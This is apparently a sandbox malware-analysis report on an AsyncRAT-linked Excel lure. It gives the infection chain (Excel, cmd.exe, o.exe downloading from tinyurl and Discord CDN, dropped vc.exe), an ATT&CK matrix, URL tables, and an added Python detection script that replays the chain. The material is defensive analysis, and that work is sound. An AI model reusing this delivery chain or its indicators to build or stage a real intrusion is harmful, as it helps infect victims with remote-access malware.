Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125A093 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125D220 memset,GetVersionExW,GetVersionExW
Source: C:\Users\user\AppData\Local\Temp\o.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
Source: Yara match | File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
Source: vc.exe, 00000020.00000002.534638947.0000000007643000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_01257732 SetErrorMode,CorBindToRuntimeEx,SysFreeString

Mitre Att&ck Matrix

Cells are technique names as drawn in the report's matrix; a trailing number is the report's count of matched signatures for that technique. Rows shorten where a column has no further entry.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Spearphishing Link1 | Scripting11 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools11 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution13 | Scheduled Task/Job1 | Process Injection12 | Deobfuscate/Decode Files or Information11 | LSASS Memory | File and Directory Discovery3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter1 | Logon Script (Windows) | Scheduled Task/Job1 | Scripting11 | Security Account Manager | System Information Discovery25 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Scheduled Task/Job1 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information12 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing2 | LSA Secrets | Security Software Discovery111 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Virtualization/Sandbox Evasion2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading1 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion2 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection12 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 320331 | Sample: 1099008FEDEX_090887766.xls | Start date: 19/11/2020 | Architecture: WINDOWS | Score: 96

Top-level signatures: Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Yara detected AsyncRAT; 6 other signatures

Process tree as drawn in the graph. Numbers in square brackets are the per-process counters shown next to the node (the graph legend lists created registry values and created files); network entries give domain, IP, ports, AS name and country.

EXCEL.EXE [71 35]
  dropped: C:\Users\...\1099008FEDEX_090887766.xls.LNK (MS)
  signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
  +-- cmd.exe [1]
  |     signature: Obfuscated command line found
  |     +-- o.exe [15 18]
  |     |     DNS/IP: tinyurl.com 104.20.138.65, 443, 49733, CLOUDFLARENETUS, United States
  |     |     DNS/IP: cdn.discordapp.com 162.159.129.233, 443, 49734, CLOUDFLARENETUS, United States
  |     |     dropped: C:\Users\user\Documents\vc.exe (PE32)
  |     |     signature: Drops PE files to the document folder of the user
  |     +-- conhost.exe
  +-- cmd.exe [1]
  |     +-- Robocopy.exe [3 2]
  |     |     dropped: C:\Users\user\AppData\...\powershell.exe (PE32)
  |     +-- conhost.exe
  +-- cmd.exe [1]
  |     +-- o.exe
  |     |     +-- vc.exe
  |     +-- conhost.exe
  +-- 3 other processes
        +-- o.exe [18]
        +-- conhost.exe
        +-- 3 other processes
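The chain the graph draws (EXCEL.EXE spawning cmd.exe, cmd.exe running o.exe from the user's Temp directory, o.exe resolving tinyurl.com / cdn.discordapp.com and writing vc.exe into Documents, then vc.exe starting under that chain) is what an endpoint detection would key on rather than any single hash. The Python below is an added example, not part of this Joe Sandbox report or its tooling: it rebuilds process ancestry from Sysmon-style events and runs four rules over a constructed event list that replays the chain. The PIDs, the cmd.exe command line, the Office install path and the notepad/DNS noise events are invented; the domains, IPs and dropped-file paths are the ones this report lists.

```python
"""Detection rules replayed over constructed Sysmon-style events.

Added example; the event records are hand-written to mirror the process
chain in the behaviour graph. Field names follow Sysmon (EventID 1 process
create, 3 network connect, 11 file create, 22 DNS query); PIDs, the cmd.exe
command line and the notepad/DNS noise are invented, not captured.
"""

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Network indicators copied from the report's Contacted Domains section.
IOC_DOMAINS = {"tinyurl.com", "cdn.discordapp.com"}
IOC_IPS = {"104.20.138.65", "162.159.129.233"}
# Writable user locations the report shows PE files being dropped into or run from.
USER_DROP_DIRS = ("\\documents\\", "\\appdata\\roaming\\", "\\appdata\\local\\temp\\")

EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"  # assumed install path
CMD = r"C:\Windows\System32\cmd.exe"
O_EXE = r"C:\Users\user\AppData\Local\Temp\o.exe"
VC_EXE = r"C:\Users\user\AppData\Roaming\vc.exe"

SAMPLE_EVENTS = [  # constructed, not captured from the sandbox run
    {"EventID": 1, "ProcessId": 100, "Image": EXCEL, "ParentProcessId": 1,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "EXCEL.EXE 1099008FEDEX_090887766.xls"},
    {"EventID": 1, "ProcessId": 200, "Image": CMD, "ParentProcessId": 100,
     "ParentImage": EXCEL, "CommandLine": 'cmd /c "set q=o.exe&&call %q%"'},  # invented command line
    {"EventID": 1, "ProcessId": 300, "Image": O_EXE, "ParentProcessId": 200,
     "ParentImage": CMD, "CommandLine": "o.exe"},
    {"EventID": 22, "ProcessId": 300, "QueryName": "tinyurl.com"},
    {"EventID": 3, "ProcessId": 300, "DestinationIp": "162.159.129.233", "DestinationPort": 443},
    {"EventID": 11, "ProcessId": 300, "TargetFilename": r"C:\Users\user\Documents\vc.exe"},
    {"EventID": 1, "ProcessId": 400, "Image": VC_EXE, "ParentProcessId": 300,
     "ParentImage": O_EXE, "CommandLine": "vc.exe"},
    # Benign noise that must not fire: Explorer starting Notepad, an ordinary lookup.
    {"EventID": 1, "ProcessId": 500, "Image": r"C:\Windows\System32\notepad.exe", "ParentProcessId": 1,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 22, "ProcessId": 500, "QueryName": "www.microsoft.com"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run the rules over events in order; return a list of (rule, pid, detail).

    Ancestry is rebuilt from EventID 1 records so a rule can ask whether a file
    write or DNS query came from somewhere under an Office process, even when
    the direct parent is cmd.exe or a dropped loader such as o.exe.
    """
    parent_of, image_of, findings = {}, {}, []

    def office_ancestor(pid):
        pid = parent_of.get(pid)  # start at the parent, not the process itself
        seen = set()
        while pid in image_of and pid not in seen:
            seen.add(pid)
            if image_name(image_of[pid]) in OFFICE_IMAGES:
                return pid
            pid = parent_of.get(pid)
        return None

    for ev in events:
        pid, eid = ev["ProcessId"], ev["EventID"]
        if eid == 1:
            parent_of[pid], image_of[pid] = ev["ParentProcessId"], ev["Image"]
            child, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
            if parent in OFFICE_IMAGES and child in SHELL_IMAGES:
                findings.append(("office_spawns_shell", pid, ev["CommandLine"]))
            elif office_ancestor(pid) and ev["Image"].lower().startswith("c:\\users\\"):
                findings.append(("office_chain_runs_exe_from_user_profile", pid, ev["Image"]))
        elif eid == 11:
            target = ev["TargetFilename"].lower()
            if target.endswith(".exe") and any(d in target for d in USER_DROP_DIRS) and office_ancestor(pid):
                findings.append(("office_chain_drops_pe_in_user_profile", pid, ev["TargetFilename"]))
        elif eid == 22 and ev["QueryName"].lower() in IOC_DOMAINS:
            findings.append(("ioc_domain_query", pid, ev["QueryName"]))
        elif eid == 3 and ev["DestinationIp"] in IOC_IPS:
            findings.append(("ioc_ip_connection", pid, ev["DestinationIp"]))
    return findings


def rules_fired(events):
    """Sorted set of rule names that fired; handy for assertions and alert summaries."""
    return sorted({rule for rule, _, _ in detect(events)})


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid:<4d} {detail}")
```

The two IOC rules are the brittle part: tinyurl.com and cdn.discordapp.com are shared infrastructure, so on a real fleet they belong in a low-severity enrichment tier, while the ancestry rules (Office process somewhere up the tree, executable written to or launched from the user profile) survive a change of shortener and CDN.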

      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
1099008FEDEX_090887766.xls | 15% | ReversingLabs | Document-Word.Trojan.Heuristic

      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\powershell.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\powershell.exe | 0% | ReversingLabs |

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation (3 verdicts) | safe
https://wus2-000.contentsync. | 0% | URL Reputation (3 verdicts) | safe
https://powerlift.acompli.net | 0% | URL Reputation (3 verdicts) | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation (3 verdicts) | safe
https://cortana.ai | 0% | URL Reputation (3 verdicts) | safe
https://api.aadrm.com/ | 0% | URL Reputation (3 verdicts) | safe
http://www.sajatypeworks.com | 0% | URL Reputation (3 verdicts) | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 verdicts) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 verdicts) | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (3 verdicts) | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (3 verdicts) | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation (3 verdicts) | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation (3 verdicts) | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation (3 verdicts) | safe
https://tinyurl.com4 | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation (3 verdicts) | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation (3 verdicts) | safe
http://ocsp.comodoca4.com0 | 0% | URL Reputation (3 verdicts) | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation (3 verdicts) | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation (3 verdicts) | safe
https://www.odwebp.svc.ms | 0% | URL Reputation (3 verdicts) | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation (3 verdicts) | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation (3 verdicts) | safe
http://www.carterandcone.coml | 0% | URL Reputation (3 verdicts) | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation (3 verdicts) | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation (3 verdicts) | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 verdicts) | safe
http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation (3 verdicts) | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation (3 verdicts) | safe
https://cdn.discordapp.com4 | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation (3 verdicts) | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tinyurl.com | 104.20.138.65 | true | false | | high
cdn.discordapp.com | 162.159.129.233 | true | false | | high

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://tinyurl.com/y3m5fwhq | o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp | false | | high
https://login.microsoftonline.com/ | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://shell.suite.office.com:1443 | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://cdn.entity. | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
https://api.addins.omex.office.net/appinfo/query | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://wus2-000.contentsync. | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://powerlift.acompli.net | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://cortana.ai | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
http://www.fontbureau.com/designers | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | | high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://api.aadrm.com/ | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | URL Reputation: safe (3 verdicts) | unknown
http://www.sajatypeworks.com | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | URL Reputation: safe (3 verdicts) | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/cThe | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | URL Reputation: safe (3 verdicts) | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://api.microsoftstream.com/api/ | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://cr.office.com | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
http://www.galapagosdesign.com/DPlease | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | URL Reputation: safe (3 verdicts) | unknown
http://www.urwpp.deDPlease | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | URL Reputation: safe (3 verdicts) | unknown
http://www.zhongyicts.com.cn | vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp | false | URL Reputation: safe (3 verdicts) | unknown
https://portal.office.com/account/?ref=ClientMeControl | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | o.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmp | false | | high
https://ecs.office.com/config/v2/Office | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
https://graph.ppe.windows.net | 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr | false | | high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://powerlift-frontdesk.acompli.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://tasks.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                            high
                                                            https://officeci.azurewebsites.net/api/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              high
                                                              https://store.office.cn/addinstemplate32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://tinyurl.com4o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngo.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://wus2-000.pagecontentsync.32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlo.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                  high
                                                                  https://globaldisco.crm.dynamics.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                    high
                                                                    http://ocsp.comodoca4.com0o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      high
                                                                      https://store.officeppe.com/addinstemplate32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://dev0-api.acompli.net/autodetect32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.discordapp.com/attachments/770629131393o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://www.odwebp.svc.ms32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://api.powerbi.com/v1.0/myorg/groups32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                          high
                                                                          https://web.microsoftstream.com/video/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                            high
                                                                            https://graph.windows.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                              high
                                                                              https://dataservice.o365filtering.com/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://github.com/Pester/Pestero.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://officesetup.getmicrosoftkey.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://analysis.windows.net/powerbi/api32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                  high
                                                                                  http://www.carterandcone.comlvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://prod-global-autodetect.acompli.net/autodetect32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fontbureau.com/designers/frere-jones.htmlvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://outlook.office365.com/autodiscover/autodiscover.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                      high
                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                        high
                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                          high
                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                            high
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                              high
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                high
                                                                                                http://weather.service.msn.com/data.aspx32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                  high
                                                                                                  https://apis.live.net/v5.0/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                    high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                      high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                        high
                                                                                                        https://management.azure.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designersGvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://incidents.diagnostics.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                high
                                                                                                                http://www.fontbureau.com/designers/?vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.founder.com.cn/cn/bThevc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers?vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                        high
